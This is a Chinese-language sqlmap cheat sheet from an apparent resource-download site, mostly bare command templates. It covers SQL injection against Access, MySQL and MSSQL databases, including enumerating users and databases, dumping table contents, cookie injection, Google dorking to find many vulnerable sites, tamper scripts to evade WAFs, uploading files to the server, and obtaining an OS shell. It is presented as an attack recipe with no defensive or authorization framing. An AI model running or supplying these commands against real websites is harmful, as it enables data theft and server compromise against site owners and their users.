access数据库注入
sqlmap.py -u “”
sqlmap.py -u “” —tables 参数:列表名
sqlmap.py -u “” –columns -T “” 参数:列字段
sqlmap.py -u “” –dump -C “” -T “” 参数:下载数据
=========================================================================
MySQL数据库注入
sqlmap.py -u “”
sqlmap.py -u “” –is-dba 当前用户权限
sqlmap.py -u “” –dbs 所有数据库
sqlmap.py -u “” –current-db 网站当前数据库
sqlmap.py -u “” –users 所有数据库用户
sqlmap.py -u “” –current-user 当前数据库用户
sqlmap.py -u “” —tables -D “”
sqlmap.py -u “” –columns -T “” -D “”
sqlmap.py -u “” –dump -C “” -T “” -D “”
=========================================================================
MsSQL数据库注入
sqlmap.py -u “”
sqlmap.py -u “” –is-dba 当前用户权限
sqlmap.py -u “” –dbs 所有数据库
sqlmap.py -u “” –users 所有数据库用户
sqlmap.py -u “” –current-db 网站当前数据库
sqlmap.py -u “” –current-user 当前数据库用户
sqlmap.py -u “” –tables -D “”
sqlmap.py -u “” –columns -T “” -D “”
sqlmap.py -u “” –dump -C “” -T “” -D “”(sqlmap.py -u “” –dump -T “” -D “”)
=========================================================================
Cookie中转注入
sqlmap.py -u “”
sqlmap.py -u “” –cookie “id=?” –level ?
sqlmap.py -u “” –cookie “id=?” –level ? –tables
sqlmap.py -u “” –cookie “id=?” –level ? –columns -T “”
sqlmap.py -u “” –cookie “id=?” –level ? –dump -C “” -T “”
=========================================================================
利用google批量搜索注入
sqlmap.py -g “” 谷歌关键字搜索
搜索引擎语法:
inurl
intext
intitle
site
=========================================================================
tamper插件使用
sqlmap.py -u “”
sqlmap.py -u “” -v 3 –batch — tamper “”
sqlmap.py -u “” –check-waf –tamper “”
=========================================================================
file参数使用(必须是dba)
sqlmap.py -u “”
sqlmap.py -u “” –is-dba 当前用户权限
sqlmap.py -u “” –file-write=D:/需上传的文件名 –file-dest=硬盘:/文件夹/…/需上传的文件列名
=========================================================================
post提交方式注入
sqlmap.py -u “” –forms
sqlmap.py -r “” 文本文档名
=========================================================================
OS参数
sqlmap.py -u “” –os-cmd= (推荐win)
sqlmap.py -u “” –os-shell (exit)
vivi小偷官网 » sqlmap绕过过滤的 tamper 脚本分类汇总以及sqlmap思维导图和SqlMap免Python环境绿色版下载
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 提示下载完但解压或打开不了?
- 找不到素材资源介绍文章里的示例图片?
- Vivi资源网